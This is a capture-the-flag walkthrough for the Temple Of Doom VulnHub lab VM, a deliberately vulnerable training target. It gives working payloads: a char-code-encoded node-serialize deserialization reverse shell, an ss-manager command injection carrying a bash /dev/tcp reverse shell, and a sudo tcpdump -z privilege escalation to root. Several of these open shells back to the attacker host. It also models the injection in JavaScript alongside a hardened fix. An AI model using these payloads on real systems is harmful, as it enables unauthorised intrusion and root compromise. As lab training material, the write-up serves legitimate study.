[VulnHub Walkthrough] Temple Of Doom: 1


Preparation

Target basics

Target name: Temple Of Doom 1
Operating system: Linux
Hypervisor: VirtualBox
Network mode: bridged to the physical network
Objective: obtain root on the target and read the flag file

Download: 1. Temple of Doom: 1 ~ VulnHub

2. VulnHub targets mirrored on Baidu Netdisk (the VMware build is recommended)

Environment setup

Download and extract the target archive from the shared link, then on the VMware Workstation home screen choose File => Open and select Temple_Of_Doom.ovf in the file dialog to import the VM.


Information gathering

IP discovery

Before attacking the target we first locate its IP address with netdiscover:

shell
netdiscover -r 192.168.2.0/24

The target's IP address is 192.168.2.131.

Firewall probing

Knowing the target's IP, we first check basic connectivity with ping:

shell
└─# ping -c 4 192.168.2.131
PING 192.168.2.131 (192.168.2.131) 56(84) bytes of data.
64 bytes from 192.168.2.131: icmp_seq=1 ttl=64 time=1.64 ms
64 bytes from 192.168.2.131: icmp_seq=2 ttl=64 time=0.902 ms
64 bytes from 192.168.2.131: icmp_seq=3 ttl=64 time=0.848 ms
64 bytes from 192.168.2.131: icmp_seq=4 ttl=64 time=0.871 ms

--- 192.168.2.131 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3006ms
rtt min/avg/max/mdev = 0.848/1.064/1.637/0.331 ms

Connectivity between the attacker machine and the target is good.

Next we send TCP ACK packets with Nmap to look for a stateful firewall in front of the host:

shell
┌──(root㉿attacker)-[/home/hacker]
└─# nmap -sA -p- 192.168.2.131 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-27 10:23 CST
Nmap scan report for 192.168.2.131 (192.168.2.131)
Host is up (0.00029s latency).
All 65535 scanned ports on 192.168.2.131 (192.168.2.131) are in ignored states.
Not shown: 65535 unfiltered tcp ports (reset)
MAC Address: 00:0C:29:D5:F5:FD (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.50 seconds

Every port answered with a RST ("unfiltered"), so no stateful packet filter sits between us and the target. An ACK scan cannot tell open ports from closed ones, so we move on to a normal port scan.

Port scanning

Now we use a Nmap SYN scan to enumerate all TCP ports with service versions and an OS fingerprint, and a UDP scan with the default scripts:

shell
nmap -sS -sV -O -p- -oN ./tcp_result.txt 192.168.2.131
nmap -sC -sU -sV -T4 -oN ./udp_result.txt 192.168.2.131

TCP scan results (screenshot)

UDP scan results (screenshot)

The target exposes the following ports:

Port  Transport  Service  Details
22    TCP        SSH      OpenSSH 7.7 (protocol 2.0)
666   TCP        HTTP     Node.js Express framework

Nmap also estimates the kernel as Linux 3.2 - 4.9. (Local enumeration later shows 4.16.3, so treat the remote OS fingerprint as a rough guide only.)


Service enumeration

SSH (port 22)

Grab the banner with Netcat:

shell
┌──(root㉿attacker)-[/home/hacker/Documents/vulnhub_notes/temple_of_doom]
└─# nc -nv 192.168.2.131 22
(UNKNOWN) [192.168.2.131] 22 (ssh) open
SSH-2.0-OpenSSH_7.7

An ssh connection attempt to the target's root account hung without any response, so the SSH service appears to be broken and we leave it aside.

Web application (port 666)

Open the site's homepage in a browser (refresh once): http://192.168.2.131:666/

The page turns out to hand its cookie to a Node.js deserialization module (node-serialize), which points to a deserialization vulnerability. The request looks like this:

text
GET / HTTP/1.1
Host: 192.168.2.131:666
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: profile=eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D
Upgrade-Insecure-Requests: 1

Base64-decoding the cookie value gives:

text
{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":Friday, 13 Oct 2018 00:00:00 GMT"}%3D

(The trailing %3D is the URL-encoded "=" padding of the Base64 string, not part of the JSON.) The JSON is malformed: the value of the Expires field is missing its opening double quote, which is what trips the server-side parser. After adding the quote, re-encoding to Base64 and resending, the page renders without an error, as shown:

So the handler simply takes a Base64-encoded, serialized JSON object from the cookie, deserializes it, pulls out the username member and echoes it into the page.


Exploitation

Weighing what we know, we decide to go after the deserialization bug: CVE-2017-5941 in node-serialize, where unserialize() eval()s any string carrying the function marker, so a serialized function followed by () is executed during deserialization.

We use the Node.Js-Security-Course tool to generate the reverse-shell Node code:

shell
git clone https://github.com/ajinabraham/Node.Js-Security-Course.git
chmod -R 777 ./Node.Js-Security-Course
cd ./Node.Js-Security-Course
python2 ./nodejsshell.py 192.168.2.50 443

The payload is produced (screenshot):

Next we write a short piece of Node.js to serialize it:

js
// Object whose only member is a function. node-serialize emits functions as
// "_$$ND_FUNC$$_function(){...}" strings, which unserialize() later eval()s.
// The String.fromCharCode(...) body is the nodejsshell.py output above: a
// net.Socket reverse shell to 192.168.2.50:443 that spawns /bin/sh.
var revshell = {
    rce : function(){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,50,46,53,48,34,59,10,80,79,82,84,61,34,52,52,51,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}
}
// Serialize the object and print the result; this string is what goes into the cookie.
var serialize = require('node-serialize');
console.log(serialize.serialize(revshell));

This defines the malicious object revshell, loads the node-serialize module, serializes the object and prints the result.

Output (screenshot):

Paste the output into Burp Suite's Decoder, append the call operator () right after the closing brace of the function inside the rce string value (so that unserialize() invokes it), and Base64-encode the result. URL-encode the trailing = padding as %3D, the way the original cookie did, and send the string as the profile cookie. Meanwhile start a listener on local port 443:

shell
rlwrap nc -lvnp 443

A reverse shell comes back (screenshot):


Privilege escalation

Local enumeration

With a low-privilege shell on the target, we fetch LinPEAS from a web server on the attacker machine and run it for local enumeration:

shell
wget http://192.168.2.50:9000/linpeas.sh
chmod 700 ./linpeas.sh
./linpeas.sh

Basic info (screenshot)

Users (screenshot)

Processes (screenshot)

Cron jobs (screenshot)

SUID/SGID files (screenshot)

We learn the following:

  • The web root is /home/nodeadmin/.web
  • The accounts of interest are root, nodeadmin and fireman
  • The kernel is an old Linux 4.16.3 and sudo is version 1.8.22b1
  • User fireman is running a process whose binary is /usr/local/bin/ss-manager

Privilege escalation via ss-manager

Having found the absolute path of fireman's process, we run the binary ourselves with -V to find out what it is:

shell
[nodeadmin@192 ~]$ /usr/local/bin/ss-manager -V
/usr/local/bin/ss-manager -V
 2024-01-27 21:03:36 ERROR: Unrecognized option: (null)

shadowsocks-libev 3.1.0

  maintained by Max Lv <[email protected]> and Linus Yang <[email protected]>

  usage:

    ss-manager

       -s <server_host>           Host name or IP address of your remote server.
       -p <server_port>           Port number of your remote server.
       -l <local_port>            Port number of your local server.
       -k <password>              Password of your remote server.
......

So the binary is the manager daemon of the shadowsocks-libev proxy, version 3.1.0.

Look for known vulnerabilities in that version:

shell
searchsploit shadowsocks

There is exactly one entry for this version: the ss-manager command-injection bug (CVE-2017-15924). Its proof of concept reads:

text
Proof of Concept
----------------
As passed configuration requests are getting executed, the following command
will create file "evil" in /tmp/ on the server:

nc -u 127.0.0.1 8839
    add: {"server_port":8003, "password":"test", "method":"||touch /tmp/evil||"}

The code is executed through shadowsocks-libev/src/manager.c.
If the configuration file on the file system is manipulated, the code
would get executed as soon as a Shadowsocks instance is started from
ss-manager, as long as the malicious part of the configuration has not
been overwritten.

To reproduce this we need to reach the manager on 127.0.0.1:8839/udp, so we work from the shell we already hold on the target: connect with Netcat, then send add: {"server_port":8003, "password":"test", "method":"||<command>||"} followed by a newline. The method value is pasted into the command line the manager hands to the shell, so the || operators turn <command> into a separate shell command that runs with the manager's privileges, i.e. as fireman.

Here the command is a reverse shell to port 80 on the attacker machine (with a listener waiting there, as before):

shell
[nodeadmin@192 ~]$ nc -u 127.0.0.1 8839
nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"||bash -i >& /dev/tcp/192.168.2.50/80 0>&1||"}
add: {"server_port":8003, "password":"test", "method":"||bash -i >& /dev/tcp/192.168.2.50/80 0>&1||"}

The shell comes back as fireman (screenshot):
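The following added example (not shadowsocks-libev code) models in JavaScript how ss-manager 3.1.0 turned an add: request into a command line for the shell, and shows the hardened alternative of validating each field and passing an argv array instead of a string. The option order in the command string is an approximation of manager.c and an assumption; the injection mechanism does not depend on it.

```javascript
// Added example (not shadowsocks-libev code): a JavaScript model of the ss-manager
// 3.1.0 command injection and of its hardened counterpart. The command-line
// layout below approximates manager.c and is an assumption.

// Parse one manager datagram of the form:  add: {"server_port":8003, ...}
function parseManagerRequest(datagram) {
  const m = /^\s*([a-z_]+):\s*(\{[\s\S]*\})\s*$/.exec(datagram);
  if (!m) throw new Error('malformed manager request');
  return { action: m[1], params: JSON.parse(m[2]) };
}

// Vulnerable pattern: request fields are interpolated into one string that is
// then handed to the shell (system() in the C code). With method set to
// "||touch /tmp/evil||" the shell sees
//   ss-server -m || touch /tmp/evil || -k test -p 8003 -f /tmp/8003.pid
// "ss-server -m" fails, so the || operator runs "touch /tmp/evil" next.
function buildCommandLineUnsafe(p) {
  return `ss-server -m ${p.method} -k ${p.password} -p ${p.server_port} -f /tmp/${p.server_port}.pid`;
}

// Hardened pattern: every field is checked against a strict allow-pattern and the
// result is an argv array for execFile()/execve(). No shell parses the values, so
// metacharacters in method or password are inert.
const METHOD_RE = /^[a-z0-9-]{1,32}$/;      // cipher names look like aes-256-gcm
const PASSWORD_RE = /^[\x21-\x7e]{1,128}$/; // printable ASCII, no whitespace

function buildArgvSafe(p) {
  if (typeof p.method !== 'string' || !METHOD_RE.test(p.method)) throw new Error('invalid method');
  if (typeof p.password !== 'string' || !PASSWORD_RE.test(p.password)) throw new Error('invalid password');
  const port = Number(p.server_port);
  if (!Number.isInteger(port) || port < 1 || port > 65535) throw new Error('invalid server_port');
  return ['ss-server', '-m', p.method, '-k', p.password, '-p', String(port), '-f', `/tmp/${port}.pid`];
}

// Constructed datagram: the advisory's PoC, exactly as it would arrive on 8839/udp.
const POC_DATAGRAM = 'add: {"server_port":8003, "password":"test", "method":"||touch /tmp/evil||"}';

const poc = parseManagerRequest(POC_DATAGRAM);
console.log('unsafe:', buildCommandLineUnsafe(poc.params));
try {
  buildArgvSafe(poc.params);
} catch (e) {
  console.log('safe builder rejected request:', e.message);
}
```

Seen this way, the fix is not about the UDP socket or about who may talk to 127.0.0.1:8839; it is that a configuration value must never travel through a shell.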

Privilege escalation via tcpdump

Move to fireman's home directory and list everything:

shell
[fireman@192 root]$ cd ~
cd ~
[fireman@192 ~]$ ls -lA
ls -lA
total 36
-rw------- 1 fireman fireman 2151 Jun  7  2018 .bash_history
-rw-r--r-- 1 fireman fireman   18 Mar 15  2018 .bash_logout
-rw-r--r-- 1 fireman fireman  193 Mar 15  2018 .bash_profile
-rw-r--r-- 1 fireman fireman  231 Mar 15  2018 .bashrc
drwx------ 3 fireman fireman 4096 Jun  3  2018 .config
-rw------- 1 fireman fireman   16 Jun  3  2018 .esd_auth
drwxr-xr-x 4 fireman fireman 4096 Apr 25  2018 .mozilla
drwxrwxr-x 2 fireman fireman 4096 Jun  3  2018 .shadowsocks
drwx------ 2 fireman fireman 4096 Jun  2  2018 .ssh

Check what fireman may run through sudo:

shell
[fireman@192 ~]$ sudo -l
sudo -l
Matching Defaults entries for fireman on 192:
    !visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
    LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
    LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
    LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
    LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fireman may run the following commands on 192:
    (ALL) NOPASSWD: /sbin/iptables
    (ALL) NOPASSWD: /usr/bin/nmcli
    (ALL) NOPASSWD: /usr/sbin/tcpdump

Looking up escalation paths for iptables, nmcli and tcpdump in turn, tcpdump turns out to be exploitable as follows (screenshot):

The idea: create an executable script anywhere, then use tcpdump's -z option, which runs a program on each rotated capture file, to execute it. -G 1 -W 1 rotates (and so triggers the hook) after one second, and -Z root keeps the post-rotate command running as root instead of dropping privileges. The full command is:

shell
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z <script path> -Z root

Here the script is a reverse shell to port 8000 on the attacker machine (start a listener there first):

shell
touch /tmp/getroot.sh
chmod 777 /tmp/getroot.sh
echo "#! /bin/bash" >> /tmp/getroot.sh
# The reverse-shell line must be written into the script, not just echoed to the terminal
echo "bash -i >& /dev/tcp/192.168.2.50/8000 0>&1" >> /tmp/getroot.sh
# -z runs the script once the first capture file rotates (after -G 1 second); -Z root keeps it running as root
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/getroot.sh -Z root

Success: a root shell arrives on the listener.


Flag file

File name: flag.txt
Path: /root/flag.txt
Size: 1.9 KiB
MD5: 6f14ebde10f6a78a652a632f3b1cfae6
SHA256: cb56c037ed80a9504fc019ced4a5d85508f100e62bf2a474d4320f2554adcc6c

File contents (screenshot):


This concludes the walkthrough of this target.
